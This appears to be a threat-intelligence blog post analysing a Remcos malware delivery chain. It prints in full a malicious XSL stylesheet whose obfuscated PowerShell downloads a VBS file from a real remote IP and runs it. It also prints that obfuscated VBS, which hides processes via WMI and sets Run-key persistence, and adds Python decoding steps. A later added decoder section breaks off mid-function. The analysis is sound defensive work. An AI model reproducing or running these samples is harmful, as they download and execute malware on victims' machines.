
IQ-FA007: Remcos R0lls R0yce Sighting

Posted on 2020-07-12 by Pedram Amini

Remcos: R0lls R0yce Sighting



Low Detection as of 7-9-2020

Fig 2. Low Detection



Pulls a next-stage payload via external reference to: hxxps://r0lls-r0yce.com/eft/remit[.]dotm

Fig 3. remit.dotm

<xsl:stylesheet version="1.0"
      xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
      xmlns:msxsl="urn:schemas-microsoft-com:xslt"
      xmlns:user="http://mycompany.com/mynamespace">

 <msxsl:script language="JScript" implements-prefix="user">
    <![CDATA[

var r = new ActiveXObject("WScript.Shell").Run("Powershell.exe  $asciiChars='24%43%6F%6D%70%75%74%65%72%20%3D%20%27%2E%27%3B%24%63%20%3D%20%5B%57%4D%49%43%4C%41%53%53%5D%22%5C%5C%24%63%6F%6D%70%75%74%65%72%5C%72%6F%6F%74%5C%63%69%6D%76%32%3A%57%49%6E%33%32%5F%50%72%6F%63%65%73%73%22%3B%24%66%20%3D%5B%57%4D%49%43%4C%41%53%53%5D%22%5C%5C%24%63%6F%6D%70%75%74%65%72%5C%72%6F%6F%74%5C%63%69%6D%76%32%3A%57%69%6E%33%32%5F%50%72%6F%63%65%73%73%53%74%61%72%74%75%70%22%3B%24%74%79%20%3D%24%66%2E%43%72%65%61%74%65%49%6E%73%74%61%6E%63%65%28%29%3B%24%74%79%2E%53%68%6F%77%57%69%6E%64%6F%77%20%3D%20%30%3B%24%70%72%6F%63%20%3D%20%24%63%2E%43%72%65%61%74%65%28%22%50%6F%77%65%72%73%68%65%6C%6C%20%27%28%26%27%2B%27%28%47%27%2B%27%43%27%2B%27%25%25%25%27%2E%72%65%70%6C%61%63%65%28%27%25%25%25%27%2C%27%4D%27%29%2B%27%20%2A%57%2D%27%2B%27%4F%2A%29%27%2B%20%27%4E%65%27%2B%27%74%2E%27%2B%27%57%27%2B%27%65%62%27%2B%27%43%27%2B%27%6C%69%27%2B%27%65%6E%74%29%27%2B%27%2E%44%27%2B%27%6F%77%27%2B%27%6E%6C%27%2B%27%6F%61%27%2B%27%64%27%2B%27%46%27%2B%27%69%6C%27%2B%27%65%28%27%27%68%74%74%70%3A%2F%2F%31%38%35%2E%31%37%32%2E%31%31%30%2E%32%31%37%2F%72%6F%62%78%2F%72%65%6D%69%74%2E%76%62%73%27%27%2C%27%27%24%65%6E%76%3A%41%50%50%44%41%54%41%27%27%2B%27%27%5C%65%78%70%6C%6F%72%65%72%2E%76%62%73%27%27%29%27%7C%49%45%58%3B%73%74%61%72%74%2D%70%72%6F%63%65%73%73%28%27%24%65%6E%76%3A%41%50%50%44%41%54%41%27%20%2B%20%27%5C%65%78%70%6C%6F%72%65%72%2E%76%62%73%27%29%22%2C%24%6E%75%6C%6C%2C%24%74%79%29';$jm=$asciiChars.Split('%') | forEach {[char]([convert]::toint16($_,16))};$jm -join ''|I`E`X",0);


]]> </msxsl:script>
</xsl:stylesheet>



We can use Python to decode the text above:

In [49]: data = """24%43%6F%6D%70%75%74%65%72%20%3D%20%27%2E%27%3B%24%63%20%3D%20%5B%57%4D%49%43%4C%41%53%53%5D%22%5C%5C%24%63%6F%6D%70%75%74%65%72%5C%72%6F%6F%74%5C%63%69%6D%76%32%3A%57%49%6E%33%
    ...: 32%5F%50%72%6F%63%65%73%73%22%3B%24%66%20%3D%5B%57%4D%49%43%4C%41%53%53%5D%22%5C%5C%24%63%6F%6D%70%75%74%65%72%5C%72%6F%6F%74%5C%63%69%6D%76%32%3A%57%69%6E%33%32%5F%50%72%6F%63%65%73%73%5
    ...: 3%74%61%72%74%75%70%22%3B%24%74%79%20%3D%24%66%2E%43%72%65%61%74%65%49%6E%73%74%61%6E%63%65%28%29%3B%24%74%79%2E%53%68%6F%77%57%69%6E%64%6F%77%20%3D%20%30%3B%24%70%72%6F%63%20%3D%20%24%63
    ...: %2E%43%72%65%61%74%65%28%22%50%6F%77%65%72%73%68%65%6C%6C%20%27%28%26%27%2B%27%28%47%27%2B%27%43%27%2B%27%25%25%25%27%2E%72%65%70%6C%61%63%65%28%27%25%25%25%27%2C%27%4D%27%29%2B%27%20%2A%
    ...: 57%2D%27%2B%27%4F%2A%29%27%2B%20%27%4E%65%27%2B%27%74%2E%27%2B%27%57%27%2B%27%65%62%27%2B%27%43%27%2B%27%6C%69%27%2B%27%65%6E%74%29%27%2B%27%2E%44%27%2B%27%6F%77%27%2B%27%6E%6C%27%2B%27%6
    ...: F%61%27%2B%27%64%27%2B%27%46%27%2B%27%69%6C%27%2B%27%65%28%27%27%68%74%74%70%3A%2F%2F%31%38%35%2E%31%37%32%2E%31%31%30%2E%32%31%37%2F%72%6F%62%78%2F%72%65%6D%69%74%2E%76%62%73%27%27%2C%27
    ...: %27%24%65%6E%76%3A%41%50%50%44%41%54%41%27%27%2B%27%27%5C%65%78%70%6C%6F%72%65%72%2E%76%62%73%27%27%29%27%7C%49%45%58%3B%73%74%61%72%74%2D%70%72%6F%63%65%73%73%28%27%24%65%6E%76%3A%41%50%
    ...: 50%44%41%54%41%27%20%2B%20%27%5C%65%78%70%6C%6F%72%65%72%2E%76%62%73%27%29%22%2C%24%6E%75%6C%6C%2C%24%74%79%29"""

In [50]: bytes.fromhex(data.replace("%",""))
Out[50]: b'$Computer = \'.\';$c = [WMICLASS]"\\\\$computer\\root\\cimv2:WIn32_Process";$f =[WMICLASS]"\\\\$computer\\root\\cimv2:Win32_ProcessStartup";$ty =$f.CreateInstance();$ty.ShowWindow = 0;$proc = $c.Create("Powershell \'(&\'+\'(G\'+\'C\'+\'%%%\'.replace(\'%%%\',\'M\')+\' *W-\'+\'O*)\'+ \'Ne\'+\'t.\'+\'W\'+\'eb\'+\'C\'+\'li\'+\'ent)\'+\'.D\'+\'ow\'+\'nl\'+\'oa\'+\'d\'+\'F\'+\'il\'+\'e(\'\'http://185.172.110.217/robx/remit.vbs\'\',\'\'$env:APPDATA\'\'+\'\'\\explorer.vbs\'\')\'|IEX;start-process(\'$env:APPDATA\' + \'\\explorer.vbs\')",$null,$ty)'



After pulling down the remit.vbs file hosted on the same server:

Execute("Set qSzmw = CreateObject(A55)")

IGoeL = Eval("qSzmw.ExpandEnvironmentStrings(A56)")

hNhjmvplOwAaOLCbN=Eval(kbv())

wqXOqcJkdJdgq()

GKXhaqRsIFR =Eval(iup())

Execute("VknCZrPvjTTE=IGoeL+xz1()")

Knmrerl(kol+" $g='"+VknCZrPvjTTE+hNhjmvplOwAaOLCbN+"';"+tpGBvbixtMMs())

if GKXhaqRsIFR = VknCZrPvjTTE Then

Execute(sjsjppvzjz())
else

KrnPmbtxiQ()
End if

sub KrnPmbtxiQ()

 Execute("QlRoGAMMkeBzwmFaq = GKXhaqRsIFR+hNhjmvplOwAaOLCbN")

HGMPy = wvsHEBaBTvc() & QlRoGAMMkeBzwmFaq & """ """ & VknCZrPvjTTE & """ /Y"

Knmrerl(HGMPy)

End sub

Function Knmrerl(ttt)

    ExecuteGlobal _ 
    i1 & _
    RUeS & _
    mmuwy & _
    JxnMQl & _
    ZmqC & _
    RZYfXQq & _
    LMyE & _
    xkuQUtSi & _
    obQGcDe


 End Function

Private Function eartmAh(sData) 
If Len(sData) = 0 Or Len(sData) Mod 2 <> 0 Then Exit Function

QOdP = Len(sData)

For WnQQdcztzxmT = 1 To QOdP
  If WnQQdcztzxmT Mod 2 <> 0 Then  
    YGcJgtkjCCz = YGcJgtkjCCz & Chr(Eval("&H" & Mid(sData, WnQQdcztzxmT, 2)))
    eartmAh = YGcJgtkjCCz
  End If
Next
End Function

Function sXHTcJPBlK(fg55)
    Dim p
  For p = Len(fg55) To 1 Step -1
      rer7e0v = rer7e0v & Mid(fg55, p, 1)
  Next

  sXHTcJPBlK=rer7e0v
End Function

Function ZeROwYri(OcmCBZ)
Dim l , strRet 

    For l = LBound(OcmCBZ) To UBound(OcmCBZ)
        strRet = strRet & Hex(OcmCBZ(l)) & ""
    Next 

  ZeROwYri =strRet
End Function

Function wqXOqcJkdJdgq()
AiIi="X`E`I|''#(:nioj-#(:mj$;}))61,_$(61tniot::]trevnoc[(]rahc[{#(:hcaErof#(:|#(:)'#(:'(tilpS.BOAfwsPxNuRGDZdNsktH$=mj$;'D4#(:C7#(:72#(:72#(:02#(:E6#(:96#(:F6#(:A6#(:D2#(:02#(:37#(:27#(:16#(:86#(:34#(:96#(:96#(:36#(:37#(:16#(:42#(:02#(:D3#(:76#(:E6#(:96#(:27#(:47#(:35#(:96#(:96#(:36#(:37#(:16#(:42#(:B3#(:D7#(:22#(:F5#(:42#(:87#(:03#(:22#(:D5#(:56#(:47#(:97#(:26#(:B5#(:D5#(:27#(:16#(:86#(:36#(:B5#(:B7#(:02#(:47#(:36#(:56#(:A6#(:26#(:F4#(:D2#(:86#(:36#(:16#(:54#(:27#(:F6#(:64#(:C7#(:02#(:72#(:D2#(:72#(:02#(:47#(:96#(:C6#(:07#(:37#(:D2#(:02#(:67#(:D6#(:42#(:02#(:D3#(:37#(:27#(:16#(:86#(:34#(:96#(:96#(:36#(:37#(:16#(:42#(:B3#(:85#(:06#(:54#(:06#(:94#(:C7#(:72#(:92#(:72#(:72#(:76#(:07#(:A6#(:E2#(:B6#(:36#(:16#(:47#(:47#(:14#(:F2#(:87#(:26#(:F6#(:27#(:F2#(:73#(:13#(:23#(:E2#(:03#(:13#(:13#(:E2#(:23#(:73#(:13#(:E2#(:53#(:83#(:13#(:F2#(:F2#(:A3#(:07#(:47#(:47#(:86#(:72#(:72#(:82#(:76#(:E6#(:96#(:72#(:B2#(:72#(:27#(:47#(:72#(:B2#(:72#(:35#(:72#(:B2#(:72#(:46#(:72#(:B2#(:72#(:16#(:F6#(:72#(:B2#(:72#(:C6#(:E6#(:72#(:B2#(:72#(:77#(:F6#(:72#(:B2#(:72#(:44#(:E2#(:72#(:B2#(:72#(:92#(:47#(:E6#(:56#(:72#(:B2#(:72#(:96#(:C6#(:72#(:B2#(:72#(:34#(:72#(:B2#(:72#(:26#(:56#(:72#(:B2#(:72#(:75#(:72#(:B2#(:72#(:E2#(:47#(:72#(:B2#(:72#(:56#(:E4#(:72#(:02#(:B2#(:72#(:02#(:47#(:72#(:B2#(:72#(:36#(:72#(:B2#(:72#(:56#(:A6#(:72#(:B2#(:72#(:26#(:72#(:B2#(:72#(:F4#(:D2#(:72#(:B2#(:72#(:77#(:5"
AiIi=AiIi+"6#(:72#(:B2#(:72#(:E4#(:82#(:72#(:D3#(:67#(:D6#(:42#(:B3#(:23#(:23#(:07#(:42#(:02#(:D3#(:02#(:C6#(:F6#(:36#(:F6#(:47#(:F6#(:27#(:05#(:97#(:47#(:96#(:27#(:57#(:36#(:56#(:35#(:A3#(:A3#(:D5#(:27#(:56#(:76#(:16#(:E6#(:16#(:D4#(:47#(:E6#(:96#(:F6#(:05#(:56#(:36#(:96#(:67#(:27#(:56#(:35#(:E2#(:47#(:56#(:E4#(:E2#(:D6#(:56#(:47#(:37#(:97#(:35#(:B5#(:B3#(:92#(:23#(:73#(:03#(:33#(:02#(:C2#(:D5#(:56#(:07#(:97#(:45#(:C6#(:F6#(:36#(:F6#(:47#(:F6#(:27#(:05#(:97#(:47#(:96#(:27#(:57#(:36#(:56#(:35#(:E2#(:47#(:56#(:E4#(:E2#(:D6#(:56#(:47#(:37#(:97#(:35#(:B5#(:82#(:47#(:36#(:56#(:A6#(:26#(:F4#(:F6#(:45#(:A3#(:A3#(:D5#(:D6#(:57#(:E6#(:54#(:B5#(:02#(:D3#(:02#(:23#(:23#(:07#(:42#(:B3#(:92#(:76#(:E6#(:96#(:07#(:42#(:82#(:02#(:C6#(:96#(:47#(:E6#(:57#(:02#(:D7#(:47#(:56#(:96#(:57#(:15#(:D2#(:02#(:13#(:02#(:47#(:E6#(:57#(:F6#(:36#(:D2#(:02#(:D6#(:F6#(:36#(:E2#(:56#(:C6#(:76#(:F6#(:F6#(:76#(:02#(:07#(:D6#(:F6#(:36#(:D2#(:02#(:E6#(:F6#(:96#(:47#(:36#(:56#(:E6#(:E6#(:F6#(:36#(:D2#(:47#(:37#(:56#(:47#(:02#(:D3#(:02#(:76#(:E6#(:96#(:07#(:42#(:B7#(:02#(:F6#(:46#(:B3#(:56#(:E6#(:F6#(:26#(:45#(:42#(:02#(:D4#(:02#(:C6#(:16#(:37#(:B3#(:92#(:72#(:94#(:72#(:C2#(:72#(:A2#(:72#(:82#(:56#(:36#(:16#(:C6#(:07#(:56#(:27#(:E2#(:72#(:85#(:54#(:A2#(:72#(:D3#(:56#(:E6#(:F6#(:26#(:45#(:42'=BOAfwsPxNuRGDZdNsktH$#(:ssapyB#(:yciloPnoitucexE"
Execute("AiIi=replace(AiIi,""#(:"","" "")")
Execute(QbDLgs("K n m r e r l(kol+s p a c e(1)+""-""+sXHTcJPBlK(AiIi))"))
Execute(QbDLgs("K n m r e r l(kol+s p a c e(1)+""-""+sXHTcJPBlK(AiIi))"))
End function


Function i1()
Z1="83&+:117&+:98&+:32&+:75&+:110&+:109&+:114&+:101&+:114&+:108&+:40&+:116&+:116&+:116&+:41&+:58&+:32"
Z12=PDSfB(Z1)
i1=eartmAh(ZeROwYri(Z12))
End Function 

Function RUeS()
Z2="68&+:105&+:109&+:32&+:111&+:98&+:106&+:87&+:77&+:73&+:83&+:101&+:114&+:118&+:105&+:99&+:101&+:44&+:111&+:98&+:106&+:83&+:116&+:97&+:114&+:116&+:117&+:112&+:44&+:111&+:98&+:106&+:67&+:111&+:110&+:102&+:105&+:103&+:44&+:111&+:98&+:106&+:80&+:114&+:111&+:99&+:101&+:115&+:115&+:44&+:105&+:110&+:116&+:82&+:101&+:116&+:117&+:114&+:110&+:44&+:105&+:110&+:116&+:80&+:114&+:111&+:99&+:101&+:115&+:115&+:73&+:68&+:58&+:32"
Z22=PDSfB(Z2)
RUeS=eartmAh(ZeROwYri(Z22))
End Function

Function mmuwy()
Z4="83&+:101&+:116&+:32&+:111&+:98&+:106&+:87&+:77&+:73&+:83&+:101&+:114&+:118&+:105&+:99&+:101&+:32&+:61&+:32&+:71&+:101&+:116&+:79&+:98&+:106&+:101&+:99&+:116&+:40&+:34&+:119&+:105&+:110&+:109&+:103&+:109&+:116&+:115&+:58&+:123&+:105&+:109&+:112&+:101&+:114&+:115&+:111&+:110&+:97&+:116&+:105&+:111&+:110&+:76&+:101&+:118&+:101&+:108&+:61&+:105&+:109&+:112&+:101&+:114&+:115&+:111&+:110&+:97&+:116&+:101&+:125&+:33&+:92&+:92&+:46&+:92&+:114&+:111&+:111&+:116&+:92&+:99&+:105&+:109&+:118&+:50&+:34&+:41&+:58&+:32"
Z42=PDSfB(Z4)
mmuwy=eartmAh(ZeROwYri(Z42))
End Function

Function JxnMQl()
Z5="83&+:101&+:116&+:32&+:111&+:98&+:106&+:83&+:116&+:97&+:114&+:116&+:117&+:112&+:32&+:61&+:32&+:111&+:98&+:106&+:87&+:77&+:73&+:83&+:101&+:114&+:118&+:105&+:99&+:101&+:46&+:71&+:101&+:116&+:40&+:34&+:87&+:105&+:110&+:51&+:50&+:95&+:80&+:114&+:111&+:99&+:101&+:115&+:115&+:83&+:116&+:97&+:114&+:116&+:117&+:112&+:34&+:41&+:58&+:32"
Z52=PDSfB(Z5)
JxnMQl=eartmAh(ZeROwYri(Z52))
End Function

Function ZmqC()
Z6="83&+:101&+:116&+:32&+:111&+:98&+:106&+:67&+:111&+:110&+:102&+:105&+:103&+:32&+:61&+:32&+:111&+:98&+:106&+:83&+:116&+:97&+:114&+:116&+:117&+:112&+:46&+:83&+:112&+:97&+:119&+:110&+:73&+:110&+:115&+:116&+:97&+:110&+:99&+:101&+:95&+:58&+:32"
Z62=PDSfB(Z6)
ZmqC=eartmAh(ZeROwYri(Z62))
End Function

Function RZYfXQq()
Z7="111&+:98&+:106&+:67&+:111&+:110&+:102&+:105&+:103&+:46&+:83&+:104&+:111&+:119&+:87&+:105&+:110&+:100&+:111&+:119&+:32&+:61&+:32&+:48&+:58&+:32"
Z72=PDSfB(Z7)
RZYfXQq=eartmAh(ZeROwYri(Z72))
End Function


Function LMyE()
Z8="83&+:101&+:116&+:32&+:111&+:98&+:106&+:80&+:114&+:111&+:99&+:101&+:115&+:115&+:32&+:61&+:32&+:111&+:98&+:106&+:87&+:77&+:73&+:83&+:101&+:114&+:118&+:105&+:99&+:101&+:46&+:71&+:101&+:116&+:40&+:34&+:87&+:105&+:110&+:51&+:50&+:95&+:80&+:114&+:111&+:99&+:101&+:115&+:115&+:34&+:41&+:58&+:32"
Z82=PDSfB(Z8)
LMyE=eartmAh(ZeROwYri(Z82))
End Function

Function xkuQUtSi()
Z9="105&+:110&+:116&+:82&+:101&+:116&+:117&+:114&+:110&+:32&+:61&+:32&+:111&+:98&+:106&+:80&+:114&+:111&+:99&+:101&+:115&+:115&+:46&+:67&+:114&+:101&+:97&+:116&+:101&+:40&+:116&+:116&+:116&+:44&+:32&+:78&+:117&+:108&+:108&+:44&+:32&+:111&+:98&+:106&+:67&+:111&+:110&+:102&+:105&+:103&+:44&+:32&+:105&+:110&+:116&+:80&+:114&+:111&+:99&+:101&+:115&+:115&+:73&+:68&+:41&+:58&+:32"
Z92=PDSfB(Z9)
xkuQUtSi=eartmAh(ZeROwYri(Z92))
End Function

Function obQGcDe()
Z10="69&+:110&+:100&+:32&+:83&+:117&+:98"
Z102=PDSfB(Z10)
obQGcDe=eartmAh(ZeROwYri(Z102))
End Function

Function sjsjppvzjz()
Z11="87&+:83&+:99&+:114&+:105&+:112&+:116&+:46&+:81&+:117&+:105&+:116&+:40&+:41"
Z112=PDSfB(Z11)
sjsjppvzjz=eartmAh(ZeROwYri(Z112))
End Function

Function tpGBvbixtMMs()
Z12="39&+:83&+:101&+:116&+:45&+:73&+:116&+:101&+:109&+:32&+:45&+:80&+:97&+:116&+:104&+:32&+:72&+:75&+:67&+:85&+:58&+:92&+:83&+:111&+:102&+:116&+:119&+:97&+:114&+:101&+:92&+:77&+:105&+:99&+:114&+:111&+:64&+:64&+:111&+:102&+:116&+:92&+:87&+:105&+:110&+:100&+:111&+:119&+:64&+:64&+:92&+:67&+:117&+:114&+:114&+:101&+:110&+:116&+:86&+:101&+:114&+:64&+:64&+:105&+:111&+:110&+:92&+:82&+:117&+:110&+:32&+:45&+:86&+:97&+:108&+:117&+:101&+:32&+:36&+:103&+:39&+:46&+:114&+:101&+:112&+:108&+:97&+:99&+:101&+:40&+:39&+:64&+:64&+:39&+:44&+:39&+:115&+:39&+:41&+:32&+:124&+:73&+:96&+:69&+:96&+:88"
Z122=PDSfB(Z12)
tpGBvbixtMMs=eartmAh(ZeROwYri(Z122))
End Function

Function wvsHEBaBTvc()
Z13="99&+:109&+:100&+:32&+:47&+:99&+:32&+:99&+:111&+:112&+:121&+:32&+:34"
Z132=PDSfB(Z13)
wvsHEBaBTvc=eartmAh(ZeROwYri(Z132))
End Function 

Function iup()
vlf="76&+:101&+:102&+:116&+:40&+:87&+:83&+:99&+:114&+:105&+:112&+:116&+:46&+:83&+:99&+:114&+:105&+:112&+:116&+:70&+:117&+:108&+:108&+:78&+:97&+:109&+:101&+:44&+:73&+:110&+:83&+:116&+:114&+:82&+:101&+:118&+:40&+:87&+:83&+:99&+:114&+:105&+:112&+:116&+:46&+:83&+:99&+:114&+:105&+:112&+:116&+:70&+:117&+:108&+:108&+:78&+:97&+:109&+:101&+:44&+:34&+:92&+:34&+:41&+:41"
vbn=PDSfB(vlf)
iup=eartmAh(ZeROwYri(vbn))
End Function

Function kol()
jsd="80&+:111&+:119&+:101&+:114&+:115&+:104&+:101&+:108&+:108"
jsd2=PDSfB(jsd)
kol=eartmAh(ZeROwYri(jsd2))

End Function 

Function A55()
A551="87&+:83&+:99&+:114&+:105&+:112&+:116&+:46&+:83&+:104&+:101&+:108&+:108"
A552=PDSfB(A551)
A55=eartmAh(ZeROwYri(A552))
End Function 

Function A56()
A561="37&+:85&+:83&+:69&+:82&+:80&+:82&+:79&+:70&+:73&+:76&+:69&+:37"
A562=PDSfB(A561)
A56=eartmAh(ZeROwYri(A562))
End Function

Function xz1()
wf1="92&+:65&+:112&+:112&+:68&+:97&+:116&+:97&+:92&+:76&+:111&+:99&+:97&+:108&+:92&+:77&+:105&+:99&+:114&+:111&+:115&+:111&+:102&+:116&+:92"
wf2=PDSfB(wf1)
xz1=eartmAh(ZeROwYri(wf2))
End Function

Function  kbv()
 kbv1="87&+:83&+:99&+:114&+:105&+:112&+:116&+:46&+:83&+:99&+:114&+:105&+:112&+:116&+:78&+:97&+:109&+:101"
 kbv2=PDSfB(kbv1)
 kbv=eartmAh(ZeROwYri(kbv2))
End Function 

Function PDSfB(Str)
PDSfB=Eval(QbDLgs("S p l i t(S t r,""&+:"")"))
End Function

Function QbDLgs(rhltZ)
igxMOdo = ""
For i=1 to len(rhltZ)
    char = Mid(rhltZ,i,1)
    if(char<>" ") then
    igxMOdo = igxMOdo+Mid(rhltZ,i,1)
    End if
Next
QbDLgs=igxMOdo
End Function





Looks like a bunch of encoded strings. Let's grep them out and decode them for a quick and dirty peek behind the encoding.

❯ grep "+:" remit.vbs | cut -d'"' -f2
83&+:117&+:98&+:32&+:75&+:110&+:109&+:114&+:101&+:114&+:108&+:40&+:116&+:116&+:116&+:41&+:58&+:32
68&+:105&+:109&+:32&+:111&+:98&+:106&+:87&+:77&+:73&+:83&+:101&+:114&+:118&+:105&+:99&+:101&+:44&+:111&+:98&+:106&+:83&+:116&+:97&+:114&+:116&+:117&+:112&+:44&+:111&+:98&+:106&+:67&+:111&+:110&+:102&+:105&+:103&+:44&+:111&+:98&+:106&+:80&+:114&+:111&+:99&+:101&+:115&+:115&+:44&+:105&+:110&+:116&+:82&+:101&+:116&+:117&+:114&+:110&+:44&+:105&+:110&+:116&+:80&+:114&+:111&+:99&+:101&+:115&+:115&+:73&+:68&+:58&+:32
83&+:101&+:116&+:32&+:111&+:98&+:106&+:87&+:77&+:73&+:83&+:101&+:114&+:118&+:105&+:99&+:101&+:32&+:61&+:32&+:71&+:101&+:116&+:79&+:98&+:106&+:101&+:99&+:116&+:40&+:34&+:119&+:105&+:110&+:109&+:103&+:109&+:116&+:115&+:58&+:123&+:105&+:109&+:112&+:101&+:114&+:115&+:111&+:110&+:97&+:116&+:105&+:111&+:110&+:76&+:101&+:118&+:101&+:108&+:61&+:105&+:109&+:112&+:101&+:114&+:115&+:111&+:110&+:97&+:116&+:101&+:125&+:33&+:92&+:92&+:46&+:92&+:114&+:111&+:111&+:116&+:92&+:99&+:105&+:109&+:118&+:50&+:34&+:41&+:58&+:32
83&+:101&+:116&+:32&+:111&+:98&+:106&+:83&+:116&+:97&+:114&+:116&+:117&+:112&+:32&+:61&+:32&+:111&+:98&+:106&+:87&+:77&+:73&+:83&+:101&+:114&+:118&+:105&+:99&+:101&+:46&+:71&+:101&+:116&+:40&+:34&+:87&+:105&+:110&+:51&+:50&+:95&+:80&+:114&+:111&+:99&+:101&+:115&+:115&+:83&+:116&+:97&+:114&+:116&+:117&+:112&+:34&+:41&+:58&+:32
83&+:101&+:116&+:32&+:111&+:98&+:106&+:67&+:111&+:110&+:102&+:105&+:103&+:32&+:61&+:32&+:111&+:98&+:106&+:83&+:116&+:97&+:114&+:116&+:117&+:112&+:46&+:83&+:112&+:97&+:119&+:110&+:73&+:110&+:115&+:116&+:97&+:110&+:99&+:101&+:95&+:58&+:32
111&+:98&+:106&+:67&+:111&+:110&+:102&+:105&+:103&+:46&+:83&+:104&+:111&+:119&+:87&+:105&+:110&+:100&+:111&+:119&+:32&+:61&+:32&+:48&+:58&+:32
83&+:101&+:116&+:32&+:111&+:98&+:106&+:80&+:114&+:111&+:99&+:101&+:115&+:115&+:32&+:61&+:32&+:111&+:98&+:106&+:87&+:77&+:73&+:83&+:101&+:114&+:118&+:105&+:99&+:101&+:46&+:71&+:101&+:116&+:40&+:34&+:87&+:105&+:110&+:51&+:50&+:95&+:80&+:114&+:111&+:99&+:101&+:115&+:115&+:34&+:41&+:58&+:32
105&+:110&+:116&+:82&+:101&+:116&+:117&+:114&+:110&+:32&+:61&+:32&+:111&+:98&+:106&+:80&+:114&+:111&+:99&+:101&+:115&+:115&+:46&+:67&+:114&+:101&+:97&+:116&+:101&+:40&+:116&+:116&+:116&+:44&+:32&+:78&+:117&+:108&+:108&+:44&+:32&+:111&+:98&+:106&+:67&+:111&+:110&+:102&+:105&+:103&+:44&+:32&+:105&+:110&+:116&+:80&+:114&+:111&+:99&+:101&+:115&+:115&+:73&+:68&+:41&+:58&+:32
69&+:110&+:100&+:32&+:83&+:117&+:98
87&+:83&+:99&+:114&+:105&+:112&+:116&+:46&+:81&+:117&+:105&+:116&+:40&+:41
39&+:83&+:101&+:116&+:45&+:73&+:116&+:101&+:109&+:32&+:45&+:80&+:97&+:116&+:104&+:32&+:72&+:75&+:67&+:85&+:58&+:92&+:83&+:111&+:102&+:116&+:119&+:97&+:114&+:101&+:92&+:77&+:105&+:99&+:114&+:111&+:64&+:64&+:111&+:102&+:116&+:92&+:87&+:105&+:110&+:100&+:111&+:119&+:64&+:64&+:92&+:67&+:117&+:114&+:114&+:101&+:110&+:116&+:86&+:101&+:114&+:64&+:64&+:105&+:111&+:110&+:92&+:82&+:117&+:110&+:32&+:45&+:86&+:97&+:108&+:117&+:101&+:32&+:36&+:103&+:39&+:46&+:114&+:101&+:112&+:108&+:97&+:99&+:101&+:40&+:39&+:64&+:64&+:39&+:44&+:39&+:115&+:39&+:41&+:32&+:124&+:73&+:96&+:69&+:96&+:88
99&+:109&+:100&+:32&+:47&+:99&+:32&+:99&+:111&+:112&+:121&+:32&+:34
76&+:101&+:102&+:116&+:40&+:87&+:83&+:99&+:114&+:105&+:112&+:116&+:46&+:83&+:99&+:114&+:105&+:112&+:116&+:70&+:117&+:108&+:108&+:78&+:97&+:109&+:101&+:44&+:73&+:110&+:83&+:116&+:114&+:82&+:101&+:118&+:40&+:87&+:83&+:99&+:114&+:105&+:112&+:116&+:46&+:83&+:99&+:114&+:105&+:112&+:116&+:70&+:117&+:108&+:108&+:78&+:97&+:109&+:101&+:44&+:34&+:92&+:34&+:41&+:41
80&+:111&+:119&+:101&+:114&+:115&+:104&+:101&+:108&+:108
87&+:83&+:99&+:114&+:105&+:112&+:116&+:46&+:83&+:104&+:101&+:108&+:108
37&+:85&+:83&+:69&+:82&+:80&+:82&+:79&+:70&+:73&+:76&+:69&+:37
92&+:65&+:112&+:112&+:68&+:97&+:116&+:97&+:92&+:76&+:111&+:99&+:97&+:108&+:92&+:77&+:105&+:99&+:114&+:111&+:115&+:111&+:102&+:116&+:92
87&+:83&+:99&+:114&+:105&+:112&+:116&+:46&+:83&+:99&+:114&+:105&+:112&+:116&+:78&+:97&+:109&+:101



Slap it into Python and decode. While this won't be in order, it will give us the gist of the situation:

In [48]: "".join(map(chr, (map(int, data.replace("\n", "").split("&+:")))))
Out[48]: 'Sub Knmrerl(ttt):ೄim objWMIService,objStartup,objConfig,objProcess,intReturn,intProcessID:\u0cd3et objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2"):\u0cd3et objStartup = objWMIService.Get("Win32_ProcessStartup"):\u0cd3et objConfig = objStartup.SpawnInstance_:絯bjConfig.ShowWindow = 0:\u0cd3et objProcess = objWMIService.Get("Win32_Process"):絩ntReturn = objProcess.Create(ttt, Null, objConfig, intProcessID):\u0cc5nd Su⚟Script.Quit(ါSet-Item -Path HKCU:\\Software\\Micro@@oft\\Window@@\\CurrentVer@@ion\\Run -Value $g\'.replace(\'@@\',\'s\') |I`E`⋃md /c copy ඔeft(WScript.ScriptFullName,InStrRev(WScript.ScriptFullName,"\\")ၔowershel⪇Script.Shel⩕USERPROFILE໐AppData\\Local\\Microsoft⑇Script.ScriptName'
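Every string in this chain sits behind one of three reversible encodings: the "%"-separated hex in remit.dotm, the "&+:" decimal lists grep'd above, and the reversed, "#(:"-separated PowerShell argument assembled in wqXOqcJkdJdgq, which the grep does not catch. The Python below decodes all three and is an added example, not code from the original post: AMP_LINES and PAGE_HEAD are copied from the listing, FORWARD and SAMPLE_AIII are constructed inputs in the same shape as the real argument, and the "&+:" decoder works one string at a time, which is what avoids the fused numbers behind the stray characters in Out[48].

```python
import re

# Layer used by remit.dotm ("%"-separated hex) and, with a space separator,
# by the PowerShell argument hidden in wqXOqcJkdJdgq: two-digit hex tokens.
def decode_hex_tokens(text: str, sep: str) -> str:
    """Join the hex tokens and decode them as bytes; this is what the
    [convert]::toint16($_,16) loop does one token at a time."""
    tokens = [t for t in text.strip().split(sep) if t]
    return bytes.fromhex("".join(tokens)).decode("latin-1")

# Layer used by the "&+:" strings, reproduced the way the VBS does it:
# PDSfB splits on "&+:", ZeROwYri renders each number with Hex() (no zero
# padding), and eartmAh reads the result two hex digits at a time.
def decode_amp_line(line: str) -> str:
    hexstr = "".join(format(int(tok), "X") for tok in line.strip().split("&+:"))
    if len(hexstr) % 2:
        # A value below 16 gives a one-digit Hex() and misaligns every later
        # pair; the malware's own decoder would produce garbage here too.
        raise ValueError("odd-length hex string: value < 16 in input")
    return bytes.fromhex(hexstr).decode("latin-1")

def decode_amp_lines(lines):
    """Decode each grep'd string on its own. Joining the lines first fuses the
    last number of one line with the first of the next (32 + 68 -> 3268, and
    chr(3268) is the stray character after "Knmrerl(ttt):" in Out[48])."""
    return [decode_amp_line(l) for l in lines if l.strip()]

# Layer used by wqXOqcJkdJdgq: the string is stored reversed with "#(:" in
# place of spaces, so Execute(replace(...)) followed by sXHTcJPBlK undoes it.
SEP = "#(:"

def decode_reversed_layer(aiii: str) -> str:
    return aiii.replace(SEP, " ")[::-1]

def extract_inner_hex(ps_cmd: str) -> str:
    """Pull the quoted, space-separated hex literal out of the recovered
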